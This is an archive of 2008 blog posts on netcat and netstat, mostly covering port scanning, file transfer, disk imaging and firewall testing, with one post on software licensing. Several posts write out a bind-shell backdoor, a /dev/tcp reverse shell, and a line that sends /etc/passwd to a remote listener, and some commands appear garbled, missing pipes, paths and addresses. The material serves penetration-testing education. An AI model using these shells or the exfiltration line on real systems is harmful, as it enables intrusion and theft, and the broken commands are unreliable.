Saturday, 2 August 2008

Netcat - the simple port-scan logger

Sunday and I have not debugged yet - and I have the flu. So this will be tested and fixed later.

A small script (or a more complex one if you wish) can make Netcat into a simple Port Scan Logger. A little more and it can become a simple Honeypot (next port).

A Script

# while true; do nc -l -p [port_to_monitor] -e /bin/ >> /tmp/port_connections.txt

This calls a script, /bin/ There are other ways to do this, but this is a quick and easy example. This script is as follows:

# Netcat script to record port scan details.
cat { while read; do echo "`date` > $REPLY">> log.txt; echo $REPLY; done; } netcat -v -v -l -w 3 [port_monitored] { while read;do echo "`date` < $REPLY" >> log.txt; echo $REPLY; done; }

This logs all connections to a single port from an IP address. This is a continuous loop. That is, when a connection is made, netcat will be respawned and ready to record another attempt.
Alternatively, we can log to syslog:
"echo '<0>message' nc -w 1 -u log_host 514"

Now, if we want to monitor several ports, a little extra scripting and we have a simple port scan monitor.

(for f in $(seq 1 254); do while true ; do nc -v -w3 -z $f; done)

Friday, 1 August 2008

Netcat to send files

Today, we are going to tar and compress (or gzip) the files contained within a specified
directory and then pipe the data through a Netcat client. The "–w" option can provide a few seconds of delay prior to a time-out. This covers the problem of temporary disconnects and intermitent traffic flow.

Moving the file from a listener to the netcat client.

  • A listener.

# nc -l -p 53 < /tmp/the_file_name.bin

  • The client.
#nc [IP_Address_of_Listener]

Pushing a file from the client to the netcat listener.

  • A listener.

# nc -l -p 53 > /tmp/the_file_we_want_to_copy.bin

  • The client.

#nc [IP_Address_of_Listener] 53 < /tmp/The_File_we_saved.bin

Just the reverse of what we did at first. This allows the sending or receiving of files. These files are sent in binary format, but this also allows text to be sent. Some issues can occur (and require translation) when sending from *NIX to Windows and visa versa.

No Netcat?
And of course if netcat is not installed on the client, we can still use a makeshift client such as:

# cat /etc/passwd> /dev/tcp/[IP_Address_of_Listener]/[Listener_Port]

Filtering connections
An exercise to try is to setup restrictions on the source IP that is allowed to connect. Netcat can be configured to accept connections only from a predefined source IP address. This makes the connection operate like TCP_Wrappers and is seminal to a firewall for the individual service.

Sending compressed files
In this example, the data received is piped into tar. By running tar with the “v” option (or verbose) we can see the filenames - they are printed to SDOUT (generally the screen). Omit this if you want to script this or otherwise automate this process (less noise).

To compress the output, also run tar with the “z” flag. This will automatically run the gzip compression program over the output.

Note: Not all implementations of tar support the “z” flag and it may be necessary to pipe the tar’d output to gzip in a separate step.

To do this we use the commands:

  • Client
# tar cfpz - /[directory_path]/[File] /bin/nc –w 3 [Destination_Host_IP] [Listener-Port]
or for an entire directory, just:
# tar cfpz - /[directory_path] /bin/nc –w 3 [Destination_Host_IP] [Listener-Port]

  • Listener

# nc –l -p [Listener-Port] tar xfpvz -

On the listener we reverse the process in this example and restore the files.

For the details on how to use tar see:


Together, dd and netcat make a great way to either backup a system (and all slack etc) or to remotely obtain a forensically sound copy of a partition, drive, memory etc. Say we want to make an image of /dev/hdb1 (a partition, but the entire drive can also be copied with /dev/hdb) we can use the following commands:

  • Client

# dd if=/dev/hda1 nc –v –w 15 [Netcat_Listener_IP] 1200

  • Listener

# nc –l –v –w 15 -p 1200 dd of=/tmp/image_hdb.dd

There are other options with dd that can be incorporated and I have these in other posts. In this case I have used TCP 1200 as the port, but this can be anything that is not in use. Also, UDP can be used as well, but there is a larger chance of error.

This image can now be cloned to other hosts, used as a backup to be restored the original if needed or used for forensic analysis.

Windows Port Scanning - Without a Scanner

As a side note to the Netcat posts (that are ongoing) I have a small addition, how to make a port scanner in Windows when you do not have one (or why deleting tools in windows rather than reporting them is a waste of time).

Well you can use the ftp client that is available from the command line. As an example, the following script checks
C:\> for /L %i in ([Start_Port],[increment],[End_Port]) do echo TCP Port Number %i: >> results.txt & echo open [IP_address] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>> c:\tmp\results.txt

Here [increment] is the number of ports we go up at a time (this is usually going to be 1).

For example to scan TCP ports 80 to 135 on host we would type:

for /L %i in (80,1,135) do echo TCP Port Number %i: >> port_tested.txt & echo open %i > ftp://ftp.txt/ & echo quit >> ftp://ftp.txt/ & ftp -s:ftp.txt 2>> port_tested.txt
The output in this script is stored in c:\tmp\results.txt, but this can be anywhere you like. This only does TCP and the start and end ports can be anything (as can the IP address).
It is not pretty, but it works.

In the output, whenever there is an entry such as "Connection closed by remote host." there is a port listening - which is listed on the preceeding line. When "> ftp: connect :Unknown error number" is recorded, the port is closed.
It is not perfect, it is just a simple script. At times it does get errors.
In this case, it has stopped at the input for NNTP (TCP 119). It is possible to script more errors, but there are many protocols.

And a little interaction in typing "bye" in this case gets it running again. In this case the output (below) shows a loging we could try to exploit as a part of the test process.

Connection closed by remote host.

TCP Port Number 119:

Login failed.

TCP Port Number 120:

> ftp: connect :Unknown error number

Thursday, 31 July 2008

Testing and making connections to open ports with Netcat

  • Faster than a speeding Telnet.
  • Easy to drop with a CTRL-C
  • Handles raw data in a single bound

Yes it not a bird or a plane, it is netcat.

Netcat is far faster than Telnet without the overhead and translation. This makes it superior for forensic data transfers. Unlike Telnet, netcat does not add characters.

Next, Netcat can connect over UDP. This means it can be used as a simple "Telnet" client and server - even over UDP.

On the Server:
# nc -l -p [port] -e /bin/csh
C:\ nc -l -p [port] -e C:\windows\cmd.exe

So if the aim is to have a UDP "telnet" style client over UDP 53, just run:
# nc -l -u -p 53 -e /bin/csh

Can we say a simple backdoor.

On the Client:
# nc [ServerIPAddress] [port]

So to connect to the listener above on UDP 53 at IP address we would use:
# nc -u 53

It is all really easy when you think about it. This is why it is SO EASY to bypass firewalls and routers that allow DNS traffic (or any default rules). This is why it is CRITICAL that there are restrictions on all rules that have ANY system to ANY system access.

Opps - I forgot to install netcat...

More on this later, but for our netcat client on a system when we can not install netcat, there is both /dev/TCP and /dev/UDP

  • /dev/tcp/[IPaddress]/[port]
  • /dev/ucp/[IPaddress]/[port]

So for our UDP 53 example this becomes:

  • /dev/ucp/

For the shell this becomes:

  • /bin/csh –i > /dev/tcp/[IPaddress]/[port] 0<&1 2>&1
  • /bin/csh –i > /dev/ucp/[IPaddress]/[port] 0<&1 2>&1

And hence:

  • /bin/csh –i > /dev/ucp/ 0<&1 2>&1

Shovels a shell from the target host to waiting Netcat listener. We can enter commands on the host that act as a reverse shell.

Wednesday, 30 July 2008

Vulnerability Scanning with Netcat

Netcat has a number of pre-existing scripts that can allow it to act as a simple vulnerability scanner. It does this by connecting to the port to be tester, entering data to test a vulnerability and returning the result.

A number of the commonly available test scripts include those for:

  1. RPC (Remote Proceedure Calls) - both the *NIX (Port 111) and Windows (Port 135) versions
  2. FTP (proxy tests, PASV bugs etc)
  3. Password testing (along the lines of Brutus) - that is you can try a dictionary attack and test a systems passwords.
  4. Map and export a file system
  5. Test trust relationships (such as the "R" commands)
  6. SSL - yes tere is an SSL capable version of netcat and it can be used to test SSL links
  7. A Web and CGI scanner
  8. Many more ...

Reporting the results is another issue - but what the hell... you kinow that the vulnerability is there.

Then there is scripting again:
# `perl –e ’print “A”x1024’` nc -v

A little fuzzing never hurt... But then again.

This all goes to show who a simple command can be made into a truely powerful tool.

Question of the day

In Yesterdays post...

I made a comment "This sounds like another tool..."

The question is, which tool is designed to be used to scan from one server and collect the results from another?

Blank is an extremely quick and effective port scanner. It works by forking two distinct processes:

  1. One to send the initial queries
  2. One to receive responses and reconcile them from the above

The prize - knowing that you are first...


Ryan Greenier

And yes this is Scanrand that this was similar to.

Tuesday, 29 July 2008

Port Scanning with Netcat

In this short series on commands we are looking at the uses that netcat can provide. Today we start this with a less expected use; Port scanning. Yes, Netcat is not just for connections and sending files between machines. It is also quick and dirty port scanner.

Netcat will provide the functionality of both a TCP and UDP port scanner. It misses out on many of the refinements of NMAP, but when in a bind, it will do. It will do the standard 3-way TCP handshake as well as collecting UDP responses. Best yet, if you know what you are doing you can setup Netcat to fire off packets on one system and collect the responses on another. This sounds like another tool...

The options are for both linear sequential scans or there is also an option to randomise the scanning with ports choosen out of sequence. The later option is used as it is still less likely to be detected than you would expect.

Netcat allows the scan to come from ANY source port. For firewalls that allow (ANY - ANY) from TCP/UDP 53 (DNS) or TCP 80/443 (WWW) this makes testing through a firewall simple.

The command format is as follows:
nc -v -p 53 -w4 -z [Target IP address] [Starting port for the scan] - [End port for the Scan]

The options:

  • -v This tells netcat to provide verbose output. In this mode it will print the details of each connection that is successfully created (ie the 3-way handshake completes).
  • -w4 "w" is the wait time. In this case 4 seconds.
  • -z This tells Netcat to send only minimal data for a TCP handshake and nothing else. This is known as Zero I/O mode.
  • -p Is the Source port that is used. In this case we are scanning from port 53 as if we where a DNS server...
  • -r This is the option to randomise the scan.
The command above used TCP. Having a scan of UDP ports is just as simple, all we need do is add the "-u" option to select a UDP scan. A UDP based scan from UDP 53 to scan ports 1 to 1023 of address would use the following format:
nc -v -p 53 -w4 -z 1 - 1023

On top of this, all the standard netcat options and ports are also available. We can port the output to a file (using > or >>), pipe the output to another programme (using the pipe: "").

Piping and execution
If a port is detected there are two options that are readily available. Piping was mention above where we send data all to another programme. Netx is selected execution. Using the "-e" option of netcat it is execute a programme on a successful connect.

This is handy if you are testing a particular port vulnerability. More on this will have to wait for another post. An example of this would be when a connection is made to a TCP port in the following command we run a DNS test script:
nc -v -p 53 -w4 -z -e /usr/bin/ 53

Each time in the previous example netcat connects to TCP 53 it will test the system using a script "/usr/bin/". This can be any programme you choose.

Wait you say, this is testing a single hosts and is not too useful...

This is where the wonders of scripting come into play. Say we want to scan hosts to for web ports (TCP 80), we can use a simple script such as the following.

(for f in $(seq 1 254); do nc -v -w3 -z "192.168.10.$f" 80; done)

This simple script runs through each of the hosts. With a little thought you can start to make some quite elaborate scans with just a simple tool.

Pen Testing and Audit.
This comes in handy when engaged in a penetration test. In the exent that you find a shell, it may not be feasible to upload large amounts of data, but netcat is small (and also exists natively on many UNIX/LINUX systems). Next, there is a port of Netcat for Windows. This means that it can be loaded into a Windows network over a shell exploit.

Once on the internal host, you can extend what you have done by scanning the internal network - INSIDE the firewall.

Netcat - the testers best friend.

Sending to and from separate hosts
More on this another time... The idea here is to have netcat setup as a listener on the host that is collecting the data and for it to be running on a host that is spoofing * the source address.

We will also cover the "-w" option at a future date.

* After the series on Netcat I shall get to IP spoofing (then again I could just mention the "-s" address local source address option and the fact that netcat has the "-g" source-routing hop point options, No I do not think I will mention these yet :)

The "-wN" usage options defines the buffered send-mode taht selects one line every N seconds. Another option that can be considered is to hexdump (to stderr or to a specified file) of trasmitted and received data.


What can you do with a simple programme that is designed to redirect traffic/Standard Out/ etc...

Well there is the obvious, moving files. There are a number of less obvious uses as well. Some of these include:

  1. Port and Protocol Scanning
  2. Vulnerability Scanning
  3. Testing and making connections to open ports
  4. Acting as a virtual server or honeypot
  5. A simple port-scan logger
  6. A replay attack engine
  7. A backdoor into a system and a remote shell
  8. A forwarder and Relay

I shall be covering some of these uses of this one simple command over the next few days.

For the GNU Netcat Project site - see

The command options are:

  • -d detach from console, stealth mode
  • -e prog inbound program to exec
  • -g source-routing hop point[s], up to 8 addresses
  • -G num source-routing pointer. The options are 4, 8, 12, etc...
  • -iN for "N" seconds delay interval for lines sent, ports scanned
  • -l listen mode, for inbound connects
  • -L listen harder, re-listen on socket close
  • -n numeric-only IP addresses, no DNS names - no resolving
  • -o file hex dump of traffic
  • -p port local port number
  • -r randomize local and remote ports
  • -s address local source address
  • -t answer TELNET negotiation
  • -u UDP mode
  • -v verbose mode
  • -vv be more verbose
  • -wN for N secs timeout for connects and final net reads
  • -z zero-I/O mode [used for port scanning]

Monday, 28 July 2008

Checking Active and Listening Porting in Windows

The netstat command is your friend in Windows. Although there are far superior tools, netstat is on practically all Windows systems (minus those that have been broken).

netstat -na
This command will display the ports that are active or listening on a Windows System.
This is useful in seeing what connections are being made to and from the host. This is a common command in the System Admins toolchest. A few additional and less used flags make this even more useful.

netstat -nao
The addition of the "o" adds PID (Process Identifier) to the output. This is handy if you want to find a connection and stop (or kill) it.

This can go even further.

Piping commands

Simple scripting makes these commands particularly powerful if used correctly. For instance, if you want to display only the "LISTENING" ports, piping the output to the "find" command makes this a simple process.

"netstat -nao find "LISTENING" " will display only the selection of ports thta are listening on the host. This can be used to serach for services, hosts and anything you want to look for. It comes in particularly handy when associated with the next option for the netstat command.

netstat -nab

This option is newer (XP SP2 on) and will not work on older hosts. It is worth the time to learn though. the "nab" option displays the "exe" or "dll" that is associated with the port.

This command allows the system admin to discover what program is opening a particular port on the host. Coupled with the pipe above, a simple script may be easily created to find the execuatable that has opened or is using a particular port or even to find what ports a particular program is listening on.


To go further the next step is the "Port Reporter" tool by Microsoft.

Sunday, 27 July 2008

Equipment-specific and Site Licenses

Licensing can be assigned in a variety of ways including:

  • Being restricted to use by a single user or individual,
  • A site (real or virtual), or
  • A combination of the client and the site.
An instance of such a restriction would be a grant of license allowing the use of a product for a named company that can operate the software from a single named site. Some of the common inclusions that can be found in a licensing agreement include:
  1. Definitions of the organization or the physical/logical site,
  2. Whether the license is for networked use and how many concurrent users can access the product at a single time, and
  3. How long the license grant is valid for.
Using a license outside the terms of the agreement is in effect using an unlicensed product. This leaves the organization liable for any damages in the same manner as if they used pirated software.